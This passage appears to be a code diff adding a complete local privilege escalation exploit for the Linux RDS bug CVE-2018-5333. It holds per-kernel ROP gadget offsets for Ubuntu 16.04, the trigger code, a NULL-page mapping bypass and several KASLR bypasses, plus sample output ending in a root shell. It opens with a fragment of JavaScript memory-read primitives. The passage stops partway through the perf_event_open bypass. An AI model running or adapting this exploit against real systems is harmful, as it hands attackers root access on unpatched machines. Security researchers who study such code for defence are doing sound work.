+                symoff:  b2u32(b.slice(0x0, 0x4)),
+                nsyms:   b2u32(b.slice(0x4, 0x8)),
+                stroff:  b2u32(b.slice(0x8, 0xc)),
+                strsize: b2u32(b.slice(0xc, 0x10)),
+            };
+            break;
+        }
+        off += mem.u32(Add(base, off + 0x4));
+    }
+    if(stab == null)
+    {
+        fail("stab");
+    }
+    var tmp = { base: off2addr(segs, stab.stroff), off: 0 };
+    var fn = function(i)
+    {
+        return mem.read(Add(tmp.base, tmp.off + i), 1)[0];
+    };
+    for(var i = 0; i < stab.nsyms && want.length > 0; ++i)
+    {
+        tmp.off = mem.u32(off2addr(segs, stab.symoff + i * 0x10));
+        for(var j = 0; j < want.length; ++j)
+        {
+            var s = want[j];
+            if((strcmp(fn, s)))
+            {
+                syms[s] = mem.readInt64(off2addr(segs, stab.symoff + i * 0x10 + 0x8));
+                want.splice(j, 1);
+                break;
+            }
+        }
+    }
+    return syms;
+}
+
+function strcmp(b, str)
+{
+    var fn = typeof b == "function" ? b : function(i) { return b[i]; };
+    for(var i = 0; i < str.length; ++i)
+    {
+        if(fn(i) != str.charCodeAt(i))
+        {
+            return false;
+        }
+    }
+    return fn(str.length) == 0;
+}
+
+function _u32(i)
+{
+    return b2u32(this.read(i, 4));
+}
+
+function _read(i, l)
+{
+    if (i instanceof Int64) i = i.lo();
+    if (l instanceof Int64) l = l.lo();
+    if (i + l > this.length)
+    {
+        fail(`OOB read: ${i} -> ${i + l}, size: ${l}`);
+    }
+    return this.slice(i, i + l);
+}
+
+function _readInt64(addr)
+{
+    return new Int64(this.read(addr, 8));
+}
+
+function _writeInt64(i, val)
+{
+    if (i instanceof Int64) i = i.lo();
+    this.set(val.bytes(), i);
+}
+
+
 // Simplified version of the similarly named python module.
 var Struct = (function() {
    // Allocate these once to avoid unecessary heap allocations during pack/unpack operations.
@@ -0,0 +1,883 @@
+// Local root exploit for Linux RDS rds_atomic_free_op NULL pointer dereference
+// in the rds kernel module in the Linux kernel through 4.14.13 (CVE-2018-5333).
+//
+// Includes KASLR, SMEP, and mmap_min_addr bypasses. No SMAP bypass.
+//
+// Targets:
+// - Ubuntu 16.04 kernels 4.4.0 <= 4.4.0-116
+// - Ubuntu 16.04 kernels 4.8.0 <= 4.8.0-54
+//
+// The rds kernel module is not loaded by default on Ubuntu, and is blacklisted
+// in /etc/modprobe.d/blacklist-rare-network.conf to prevent autoloading.
+// - install: sudo apt install "linux-image-extra-$(uname -r)-generic"
+// - load:    sudo insmod "/lib/modules/$(uname -r)/kernel/net/rds/rds.ko"
+//
+// This exploit is a modified extension of the original local root
+// proof of concept exploit written by wbowling as an example of using
+// CVE-2019-9213 to make previous kernel bugs exploitable:
+// - https://gist.github.com/wbowling/9d32492bd96d9e7c3bf52e23a0ac30a4
+//
+// The original exploit is based on the null pointer dereference
+// reproducer proof of concept and analysis by 0x36:
+// - https://github.com/0x36/CVE-pocs/blob/master/CVE-2018-5333-rds-nullderef.c
+//
+// wbowling has done most of the hard work, by utilising Jann Horn's
+// mmap_min_addr bypass technique (CVE-2019-9213), allowing userland to mmap
+// virtual address 0 (without which this bug would not be exploitable on
+// systems with a sufficiently large value for vm.mmap_min_addr);
+// and developing the appropriate ROP chain.
+// - https://bugs.chromium.org/p/project-zero/issues/detail?id=1792&desc=2
+//
+// This exploit adds offsets for additional kernels, and introduces some
+// additional features, such as KASLR bypasses and system checks, including:
+// - check if system supports SMAP
+// - check if system supports RDS sockets
+// - Jann Horn's mincore KASLR bypass via heap page disclosure (CVE-2017-16994)
+//   - https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
+// - spender's /proc/kallsyms KASLR bypass (requires kernel.kptr_restrict=0)
+//   - https://grsecurity.net/~spender/exploits/exploit.txt
+// - xairy's syslog KASLR bypass (requires kernel.dmesg_restrict=0)
+//   - https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c
+// - lizzie's perf_event_open KASLR bypass (requires kernel.perf_event_paranoid<2)
+//   - https://blog.lizzie.io/kaslr-and-perf.html
+//
+// Shoutout to nstarke for adding additional kernel offsets.
+// - https://github.com/bcoles/kernel-exploits/pulls?q=author:nstarke+cve-2018-5333
+//
+// This exploit also uses various code patterns copied from:
+// - xairy's exploits:
+//   - https://github.com/xairy/kernel-exploits
+// - vnik's kernel ROP code:
+//   - https://github.com/vnik5287/kernel_rop
+// ---
+// $ gcc cve-2018-5333.c -o cve-2018-5333 -Wall
+// $ ./cve-2018-5333
+// Linux RDS rds_atomic_free_op NULL pointer dereference local root (CVE-2018-5333)
+// [.] checking kernel version...
+// [.] kernel version '4.4.0-116-generic #140-Ubuntu' detected
+// [~] done, version looks good
+// [.] checking system...
+// [~] done, looks good
+// [.] mapping null address...
+// [~] done, mapped null address
+// [.] KASLR bypass enabled, getting kernel base address
+// [.] trying /proc/kallsyms...
+// [-] kernel base not found in /proc/kallsyms
+// [.] trying syslog...
+// [-] kernel base not found in syslog
+// [.] trying perf_event_open sampling...
+// [.] done, kernel text:   ffffffff9f000000
+// [.] commit_creds:        ffffffff9f0a4cf0
+// [.] prepare_kernel_cred: ffffffff9f0a50e0
+// [.] mmapping fake stack...
+// [~] done, fake stack mmapped
+// [.] executing payload 0x402119...
+// [+] got root
+// # id
+// uid=0(root) gid=0(root) groups=0(root)
+// ---
+// https://github.com/bcoles/kernel-exploits/tree/master/CVE-2018-5333
+// <bcoles@gmail.com>
+
+#define _GNU_SOURCE
+
+#include <fcntl.h>
+#include <signal.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdio.h>
+#include <stdint.h>
+#include <unistd.h>
+#include <linux/perf_event.h>
+#include <netinet/in.h>
+#include <sys/ioctl.h>
+#include <sys/klog.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <sys/utsname.h>
+
+#define DEBUG
+
+#ifdef DEBUG
+#  define dprintf printf
+#else
+#  define dprintf
+#endif
+
+#define ENABLE_SYSTEM_CHECKS            1
+#define ENABLE_KASLR_BYPASS             1
+
+#if ENABLE_KASLR_BYPASS
+#  define KERNEL_BASE_MIN               0xffffffff00000000ul
+#  define KERNEL_BASE_MAX               0xffffffffff000000ul
+#  define ENABLE_KASLR_BYPASS_KALLSYMS  1
+#  define ENABLE_KASLR_BYPASS_SYSLOG    1
+#  define ENABLE_KASLR_BYPASS_PERF      1
+#  define ENABLE_KASLR_BYPASS_MINCORE   1
+#endif
+
+// Can be overwritten by argv[1]
+char *SHELL = "/bin/sh";
+
+// Will be overwritten if ENABLE_KASLR_BYPASS is enabled (1)
+unsigned long KERNEL_BASE = 0xffffffff81000000ul;
+
+// Will be overwritten by detect_versions().
+int kernel = -1;
+
+// kernel target struct, using ROP chain from wbowling's exploit
+struct kernel_info {
+  const char* kernel_version;
+  uint64_t commit_creds;
+  uint64_t prepare_kernel_cred;
+  uint64_t xor_rdi;     //: xor edi, edi ; ret
+  uint64_t mov_rdi_rax; //: mov rdi, rax ; pop rbx ; mov rax, rdi ; pop r12 ; pop rbp ; ret
+  uint64_t xchg_esp;    //: xchg eax, esp ; shr bl, 0xbf ; xor eax, eax ; pop rbp ; ret
+  uint64_t swapgs;      //: swapgs ; pop rbp ; ret
+  uint64_t iretq;       //: iretq
+};
+
+// Targets
+struct kernel_info kernels[] = {
+  { "4.4.0-21-generic #37-Ubuntu",   0xa21c0, 0xa25b0, 0x5d0c5, 0x178157, 0x3f8158, 0x64644, 0x4cc7da },
+  { "4.4.0-22-generic #40-Ubuntu",   0xa2220, 0xa2610, 0x5d0c5, 0x178217, 0x3f89e8, 0x64644, 0x7d005  },
+  { "4.4.0-24-generic #43-Ubuntu",   0xa2340, 0xa2730, 0x5d0c5, 0x178447, 0x3f98b8, 0x64644, 0x7d125  },
+  { "4.4.0-28-generic #47-Ubuntu",   0xa24a0, 0xa2890, 0x5d0c5, 0x178717, 0x3f9f38, 0x64644, 0x585dc  },
+  { "4.4.0-31-generic #50-Ubuntu",   0xa24a0, 0xa2890, 0x5d0c5, 0x1787a7, 0x3ffed8, 0x64644, 0x7d125  },
+  { "4.4.0-38-generic #57-Ubuntu",   0xa2570, 0xa2960, 0x5d0c5, 0x178a97, 0x400968, 0x64634, 0x7d1e5  },
+  { "4.4.0-42-generic #62-Ubuntu",   0xa25c0, 0xa29b0, 0x5d0c5, 0x178ac7, 0x400d78, 0x64634, 0x7d1a5  },
+  { "4.4.0-98-generic #121-Ubuntu",  0xa2850, 0xa2c40, 0x5d0c5, 0x17a427, 0x40a138, 0x64694, 0x4b243  },
+  { "4.4.0-108-generic #131-Ubuntu", 0xa3420, 0xa3810, 0x5d0c5, 0x17af37, 0x40aa98, 0x646a4, 0x7dd35  },
+  { "4.4.0-109-generic #132-Ubuntu", 0xa3420, 0xa3810, 0x5d0c5, 0x17af37, 0x40aa98, 0x646a4, 0x7dd35  },
+  { "4.4.0-112-generic #135-Ubuntu", 0xa3a90, 0xa3e80, 0x5d0c5, 0x17b657, 0x40b238, 0x646a4, 0x54137c },
+  { "4.4.0-116-generic #140-Ubuntu", 0xa4cf0, 0xa50e0, 0x5e0c5, 0x17d5d7, 0x40ed08, 0x65734, 0x3a5b04 },
+
+  /* Untested:
+  { "4.4.0-51-generic #72-Ubuntu",   0xa2670, 0xa2a60, 0x5d0c5, 0x178cf7, 0x404d78, 0x64634, 0x7d1a5  },
+  { "4.4.0-62-generic #83-Ubuntu",   0xa2840, 0xa2c30, 0x5d0c5, 0x179747, 0x406a78, 0x64634, 0x7d1e5  },
+  { "4.4.0-63-generic #84-Ubuntu",   0xa2840, 0xa2c30, 0x5d0c5, 0x179827, 0x406e98, 0x64634, 0x406eb  },
+  { "4.4.0-66-generic #87-Ubuntu",   0xa2840, 0xa2c30, 0x5d0c5, 0x179827, 0x406e98, 0x64634, 0x406eb  },
+  { "4.4.0-70-generic #91-Ubuntu",   0xa27b0, 0xa2ba0, 0x5d0c5, 0x179847, 0x4070c8, 0x64664, 0x406eb  },
+  { "4.4.0-79-generic #100-Ubuntu",  0xa2800, 0xa2bf0, 0x5d0c5, 0x179a67, 0x408338, 0x64664, 0x7d235  },
+  { "4.4.0-87-generic #110-Ubuntu",  0xa2860, 0xa2c50, 0x5d0c5, 0x179ca7, 0x408768, 0x64694, 0x7d285  },
+  { "4.4.0-89-generic #112-Ubuntu",  0xa28a0, 0xa2c90, 0x5d0c5, 0x179d27, 0x408ae8, 0x64694, 0x7d265  },
+  { "4.4.0-96-generic #119-Ubuntu",  0xa28c0, 0xa2cb0, 0x5d0c5, 0x179e27, 0x409a48, 0x64694, 0x7d235  },
+  { "4.4.0-97-generic #120-Ubuntu",  0xa2850, 0xa2c40, 0x5d0c5, 0x179e47, 0x409a58, 0x64694, 0x4ed41  },
+  */
+
+  { "4.4.0-21-lowlatency #37-Ubuntu",   0xa3150, 0xa3560, 0x5e0c5, 0x17b2c7, 0x401288, 0x64d34, 0x7d95c },
+  { "4.4.0-22-lowlatency #40-Ubuntu",   0xa31c0, 0xa35d0, 0x5e0c5, 0x17b397, 0x401b48, 0x64d34, 0x7d9bc },
+  { "4.4.0-24-lowlatency #43-Ubuntu",   0xa32e0, 0xa36f0, 0x5e0c5, 0x17b5e7, 0x402958, 0x64d34, 0x7dadc },
+  { "4.4.0-28-lowlatency #47-Ubuntu",   0xa3450, 0xa3860, 0x5e0c5, 0x17b8c7, 0x402f48, 0x64d34, 0x7dadc },
+  //{ "4.4.0-31-lowlatency #50-Ubuntu",   0xa3450, 0xa3860, 0x5e0c5, 0x17b9a7, 0x409018, 0x64d34, 0x7dadc },
+  //{ "4.4.0-34-lowlatency #53-Ubuntu",   0xa3450, 0xa3860, 0x5e0c5, 0x17b9a7, 0x409088, 0x64d34, 0x7dadc },
+  { "4.4.0-36-lowlatency #55-Ubuntu",   0xa3430, 0xa3840, 0x5e0c5, 0x17b9e7, 0x409318, 0x64d24, 0x7dacc },
+  { "4.4.0-38-lowlatency #57-Ubuntu",   0xa3500, 0xa3910, 0x5e0c5, 0x17bcb7, 0x409b38, 0x64d24, 0x4c030 },
+  { "4.4.0-42-lowlatency #62-Ubuntu",   0xa3560, 0xa3970, 0x5e0c5, 0x17bcf7, 0x409f68, 0x64d24, 0x7db6c },
+  { "4.4.0-98-lowlatency #121-Ubuntu",  0xa38c0, 0xa3cd0, 0x5e0c5, 0x17d737, 0x413408, 0x64d84, 0x24454 },
+  { "4.4.0-109-lowlatency #132-Ubuntu", 0xa5530, 0xa5940, 0x5f0c5, 0x17f257, 0x414c18, 0x65d94, 0x7f7ac },
+  { "4.4.0-112-lowlatency #135-Ubuntu", 0xa5bd0, 0xa5fe0, 0x5f0c5, 0x17f9a7, 0x415448, 0x65d94, 0x7f8dc },
+  { "4.4.0-116-lowlatency #140-Ubuntu", 0xa6e00, 0xa7210, 0x600c5, 0x1818f7, 0x418a38, 0x66de4, 0x809ef },
+
+  { "4.8.0-34-generic #36~16.04.1-Ubuntu", 0xa5d50, 0xa6140, 0x5d0c5, 0x1876d7, 0x43d208, 0x642f4, 0x7ed2b },
+  { "4.8.0-36-generic #36~16.04.1-Ubuntu", 0xa5d50, 0xa6140, 0x5d0c5, 0x1876d7, 0x43d208, 0x642f4, 0x7ed2b },
+  { "4.8.0-39-generic #42~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43da98, 0x642f4, 0x7ed2b },
+  { "4.8.0-41-generic #44~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43da98, 0x642f4, 0x7ed2b },
+  { "4.8.0-42-generic #45~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dea8, 0x642f4, 0x5c4f3 },
+  { "4.8.0-44-generic #47~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dac8, 0x642f4, 0x7ed2b },
+  { "4.8.0-45-generic #48~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dac8, 0x642f4, 0x7ed2b },
+  { "4.8.0-46-generic #49~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dac8, 0x642f4, 0x7ed2b },
+  { "4.8.0-49-generic #52~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43dce8, 0x642f4, 0x7ed3b },
+  { "4.8.0-51-generic #54~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43dce8, 0x642f4, 0x7ed3b },
+  { "4.8.0-52-generic #55~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e208, 0x642f4, 0x7ed3b },
+  { "4.8.0-53-generic #56~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e208, 0x642f4, 0x7ed3b },
+  { "4.8.0-54-generic #57~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e208, 0x642f4, 0x7ed3b },
+  //{ "4.8.0-56-generic #61~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e278, 0x642f4, 0x7ed3b },
+  //{ "4.8.0-58-generic #63~16.04.1-Ubuntu", 0xa5d20, 0xa6110, 0x5d0c5, 0x187797, 0x43dfa8, 0x642f4, 0x7ed5b },
+
+  { "4.8.0-34-lowlatency #36~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18ae07, 0x4467f8, 0x649f4, 0x7f902 },
+  { "4.8.0-36-lowlatency #36~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18ae07, 0x4467f8, 0x649f4, 0x7f902 },
+  //{ "4.8.0-39-lowlatency #42~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aec7, 0x4470d8, 0x649f4, 0x7f902 },
+  { "4.8.0-41-lowlatency #44~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aec7, 0x4470d8, 0x649f4, 0x7f902 },
+  { "4.8.0-42-lowlatency #45~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aeb7, 0x447428, 0x649f4, 0x4b3e3 },
+  { "4.8.0-44-lowlatency #47~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aeb7, 0x447108, 0x649f4, 0x4b3e3 },
+  { "4.8.0-45-lowlatency #48~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aeb7, 0x447108, 0x649f4, 0x4b3e3 },
+  { "4.8.0-46-lowlatency #49~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aeb7, 0x447108, 0x649f4, 0x4b3e3 },
+  { "4.8.0-49-lowlatency #52~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x447278, 0x649f4, 0x4b3e3 },
+  { "4.8.0-51-lowlatency #54~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x447278, 0x649f4, 0x4b3e3 },
+  { "4.8.0-52-lowlatency #55~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477a8, 0x649f4, 0x4b3e3 },
+  { "4.8.0-53-lowlatency #56~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477a8, 0x649f4, 0x4b3e3 },
+  { "4.8.0-54-lowlatency #57~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477a8, 0x649f4, 0x7f912 },
+  //{ "4.8.0-56-lowlatency #61~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477f8, 0x649f4, 0x7f912 },
+  //{ "4.8.0-58-lowlatency #63~16.04.1-Ubuntu", 0xa6ef0, 0xa7300, 0x5e0c5, 0x18aee7, 0x447568, 0x649f4, 0x7f932 },
+
+  //{ "4.10.0-14-generic #16~16.04.1-Ubuntu", 0xab610, 0xaba00, 0x600c5, 0x194ac7, 0x458288, 0x67764, 0x34c4b },
+  //{ "4.13.0-16-generic #19~16.04.3-Ubuntu", 0xa8220, 0xa85f0, 0x5f0c5, 0x19c8a7, 0x462d18, 0x668b4, 0x2f2d4 },
+  //{ "4.13.0-37-generic #42~16.04.1-Ubuntu", 0xab1d0, 0xab5a0, 0x610c5, 0x1a0827, 0x46bf58, 0x68944, 0x3381b },
+};
+
+// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *
+// https://github.com/0x36/CVE-pocs/blob/master/CVE-2018-5333-rds-nullderef.c
+
+#define RAND_SIZE 4096
+
+#ifndef SOL_RDS
+#  define SOL_RDS 276
+#endif
+#ifndef RDS_CMSG_MASKED_ATOMIC_CSWP
+#  define RDS_CMSG_MASKED_ATOMIC_CSWP 9
+#endif
+#ifndef AF_RDS
+#  define AF_RDS 0x15
+#endif
+
+void trigger_bug()
+{
+  struct sockaddr_in sin;
+  struct msghdr msg;
+  char buf[RAND_SIZE];
+  struct cmsghdr cmsg;
+
+  memset(&sin, 0, sizeof(struct sockaddr));
+  memset(&msg, 0, sizeof(msg));
+  memset(buf, 0x40, sizeof(buf));
+  memset(&cmsg, 0, sizeof(cmsg));
+
+  int fd = socket(AF_RDS, 5, 0);
+  if(fd < 0) {
+    dprintf("[-] socket(AF_RDS): %m\n");
+    return;
+  }
+
+  sin.sin_family = AF_INET;
+  sin.sin_port = htons(2000);
+  sin.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
+
+  bind(fd, (struct sockaddr*)&sin, sizeof(sin));
+
+  cmsg.cmsg_len = RAND_SIZE;
+  cmsg.cmsg_type = RDS_CMSG_MASKED_ATOMIC_CSWP;
+  cmsg.cmsg_level = SOL_RDS;
+
+  memcpy(&buf[0], &cmsg, sizeof(cmsg));
+
+  *(uint64_t *)(buf + 0x18) = 0x40404000; /* args->local_addr */
+
+  msg.msg_name = &sin;
+  msg.msg_namelen = sizeof(sin);
+  msg.msg_iov = NULL;
+  msg.msg_iovlen = 0;
+  msg.msg_control = buf;
+  msg.msg_controllen = RAND_SIZE;
+  msg.msg_flags = MSG_DONTROUTE|MSG_PROXY|MSG_WAITALL;
+
+  sendmsg(fd, &msg, 0);
+}
+
+// * * * * * * * * * * * * * * map null address * * * * * * * * * * * * *
+// https://bugs.chromium.org/p/project-zero/issues/detail?id=1792&desc=2
+
+void map_null() {
+  void *map = mmap((void *)0x10000, 0x1000, PROT_READ | PROT_WRITE,
+    MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN | MAP_FIXED, -1, 0);
+
+  if (map == MAP_FAILED) {
+    dprintf("[-] mmap(null): %m\n");
+    exit(EXIT_FAILURE);
+  }
+
+  char* path = "/proc/self/mem";
+  int fd = open(path, O_RDWR);
+
+  if (fd == -1) {
+    dprintf("open(%s): %m\n", path);
+    exit(EXIT_FAILURE);
+  }
+
+  unsigned long addr = (unsigned long)map;
+
+  while (addr != 0) {
+    addr -= 0x1000;
+    if (lseek(fd, addr, SEEK_SET) == -1) {
+      dprintf("lseek()\n");
+      exit(EXIT_FAILURE);
+    }
+    char cmd[1000];
+    sprintf(cmd, "LD_DEBUG=help su 1>&%d", fd);
+    system(cmd);
+  }
+}
+
+// * * * * * * * * * * * * * * * save state * * * * * * * * * * * * * * *
+// https://github.com/vnik5287/kernel_rop
+
+unsigned long user_cs, user_ss, user_rflags;
+
+static void save_state() {
+  asm(
+  "movq %%cs, %0\n"
+  "movq %%ss, %1\n"
+  "pushfq\n"
+  "popq %2\n"
+  : "=r" (user_cs), "=r" (user_ss), "=r" (user_rflags) : : "memory");
+}
+
+// * * * * * * * * * * * * * * SIGSEGV handler * * * * * * * * * * * * * *
+
+void handler(int signo, siginfo_t* info, void* vcontext) {}
+
+void debug_enable_sigsev_handler() {
+  struct sigaction action;
+  memset(&action, 0, sizeof(struct sigaction));
+  action.sa_flags = SA_SIGINFO;
+  action.sa_sigaction = handler;
+  sigaction(SIGSEGV, &action, NULL);
+}
+
+// * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * *
+
+#define CHUNK_SIZE 1024
+
+int read_file(const char* file, char* buffer, int max_length) {
+  int f = open(file, O_RDONLY);
+  if (f == -1)
+    return -1;
+  int bytes_read = 0;
+  while (1) {
+    int bytes_to_read = CHUNK_SIZE;
+    if (bytes_to_read > max_length - bytes_read)
+      bytes_to_read = max_length - bytes_read;
+    int rv = read(f, &buffer[bytes_read], bytes_to_read);
+    if (rv == -1)
+      return -1;
+    bytes_read += rv;
+    if (rv == 0)
+      return bytes_read;
+  }
+}
+
+#define PROC_CPUINFO_LENGTH 4096
+
+static int check_env() {
+  int fd = socket(AF_RDS, 5, 0);
+  if(fd < 0) {
+    dprintf("[-] socket(AF_RDS): RDS kernel module not loaded?\n");
+    exit(EXIT_FAILURE);
+  }
+
+  char buffer[PROC_CPUINFO_LENGTH];
+  char* path = "/proc/cpuinfo";
+  int length = read_file(path, &buffer[0], PROC_CPUINFO_LENGTH);
+  if (length == -1) {
+    dprintf("[-] open/read(%s): %m\n", path);
+    exit(EXIT_FAILURE);
+  }
+
+  char* found = memmem(&buffer[0], length, "smap", 4);
+  if (found != NULL) {
+    dprintf("[-] SMAP detected, no bypass available\n");
+    exit(EXIT_FAILURE);
+  }
+
+  struct stat st;
+
+  if (stat("/dev/grsec", &st) == 0) {
+    dprintf("[!] Warning: grsec is in use\n");
+  }
+
+  if (stat("/proc/sys/lkrg", &st) == 0) {
+    dprintf("[!] Warning: lkrg is in use\n");
+  }
+
+  return 0;
+}
+
+struct utsname get_kernel_version() {
+  struct utsname u;
+  int rv = uname(&u);
+  if (rv != 0) {
+    dprintf("[-] uname()\n");
+    exit(EXIT_FAILURE);
+  }
+  return u;
+}
+
+#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))
+#define KERNEL_VERSION_SIZE_BUFFER 512
+
+void detect_versions() {
+  struct utsname u;
+  char kernel_version[KERNEL_VERSION_SIZE_BUFFER];
+
+  u = get_kernel_version();
+
+  if (strstr(u.machine, "64") == NULL) {
+    dprintf("[-] system is not using a 64-bit kernel\n");
+    exit(EXIT_FAILURE);
+  }
+
+  if (strstr(u.version, "-Ubuntu") == NULL) {
+    dprintf("[-] system is not using an Ubuntu kernel\n");
+    exit(EXIT_FAILURE);
+  }
+
+  char *u_ver = strtok(u.version, " ");
+  snprintf(kernel_version, KERNEL_VERSION_SIZE_BUFFER, "%s %s", u.release, u_ver);
+
+  int i;
+  for (i = 0; i < ARRAY_SIZE(kernels); i++) {
+    if (strcmp(kernel_version, kernels[i].kernel_version) == 0) {
+      dprintf("[.] kernel version '%s' detected\n", kernels[i].kernel_version);
+      kernel = i;
+      return;
+    }
+  }
+
+  dprintf("[-] kernel version '%s' not recognized\n", kernel_version);
+  exit(EXIT_FAILURE);
+}
+
+// * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *
+// https://grsecurity.net/~spender/exploits/exploit.txt
+
+#if ENABLE_KASLR_BYPASS_KALLSYMS
+unsigned long get_kernel_addr_kallsyms() {
+  FILE *f;
+  unsigned long addr = 0;
+  char dummy;
+  char sname[256];
+  char* name = "startup_64";
+  char* path = "/proc/kallsyms";
+
+  dprintf("[.] trying %s...\n", path);
+  f = fopen(path, "r");
+  if (f == NULL) {
+      dprintf("[-] open/read(%s): %m\n", path);
+      return 0;
+  }
+
+  int ret = 0;
+  while (ret != EOF) {
+    ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
+    if (ret == 0) {
+      fscanf(f, "%s\n", sname);
+      continue;
+    }
+    if (!strcmp(name, sname)) {
+      fclose(f);
+      if (addr == 0)
+        dprintf("[-] kernel base not found in %s\n", path);
+      return addr;
+    }
+  }
+
+  fclose(f);
+  dprintf("[-] kernel base not found in %s\n", path);
+  return 0;
+}
+#endif
+
+// * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *
+// https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c
+
+#if ENABLE_KASLR_BYPASS_SYSLOG
+#define SYSLOG_ACTION_READ_ALL 3
+#define SYSLOG_ACTION_SIZE_BUFFER 10
+
+int mmap_syslog(char** buffer, int* size) {
+  *size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
+  if (*size == -1) {
+    dprintf("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER): %m\n");
+    return 1;
+  }
+
+  *size = (*size / getpagesize() + 1) * getpagesize();
+  *buffer = (char*)mmap(NULL, *size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+
+  *size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);
+  if (*size == -1) {
+    dprintf("[-] klogctl(SYSLOG_ACTION_READ_ALL): %m\n");
+    return 1;
+  }
+
+  return 0;
+}
+
+unsigned long get_kernel_addr_syslog_xenial(char* buffer, int size) {
+  const char* needle1 = "Freeing unused";
+  char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
+  if (substr == NULL)
+    return 0;
+
+  int start = 0;
+  int end = 0;
+  for (start = 0; substr[start] != '-'; start++);
+  for (end = start; substr[end] != '\n'; end++);
+
+  const char* needle2 = "ffffff";
+  substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
+
+  if (substr == NULL)
+    return 0;
+
+  char* endptr = &substr[16];
+  unsigned long addr = strtoul(&substr[0], &endptr, 16);
+
+  addr &= 0xfffffffffff00000ul;
+  addr -= 0x1000000ul;
+
+  if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
+    return addr;
+
+  return 0;
+}
+
+unsigned long get_kernel_addr_syslog() {
+  unsigned long addr = 0;
+  char* syslog;
+  int size;
+
+  dprintf("[.] trying syslog...\n");
+
+  if (mmap_syslog(&syslog, &size))
+    return 0;
+
+  addr = get_kernel_addr_syslog_xenial(syslog, size);
+
+  if (!addr)
+    dprintf("[-] kernel base not found in syslog\n");
+
+  return addr;
+}
+#endif
+
+// * * * * * * * * * * * perf_event_open KASLR bypass * * * * * * * * * * *
+// https://blog.lizzie.io/kaslr-and-perf.html
+
+#if ENABLE_KASLR_BYPASS_PERF
+int perf_event_open(struct perf_event_attr *attr, pid_t pid, int cpu, int group_fd, unsigned long flags)
+{
+  return syscall(SYS_perf_event_open, attr, pid, cpu, group_fd, flags);
+}
+
+unsigned long get_kernel_addr_perf() {
+  int fd;
+  pid_t child;
+
+  dprintf("[.] trying perf_event_open sampling...\n");
+
+  child = fork();
+
+  if (child == -1) {
+    dprintf("[-] fork() failed: %m\n");
+    return 0;
+  }
+
+  if (child == 0) {
+    struct utsname self = {0};
+    while (1) uname(&self);
+    return 0;
+  }
+
+  struct perf_event_attr event = {
+    .type = PERF_TYPE_SOFTWARE,
+    .config = PERF_COUNT_SW_TASK_CLOCK,
+    .size = sizeof(struct perf_event_attr),
+    .disabled = 1,
+    .exclude_user = 1,
+    .exclude_hv = 1,
+    .sample_type = PERF_SAMPLE_IP,
+    .sample_period = 10,
+    .precise_ip = 1
+  };
+
+  fd = perf_event_open(&event, child, -1, -1, 0);
+
+  if (fd < 0) {
+    dprintf("[-] syscall(SYS_perf_event_open): %m\n");
+    if (child) kill(child, SIGKILL);
+    if (fd > 0) close(fd);
+    return 0;
+  }
+
+  uint64_t page_size = getpagesize();
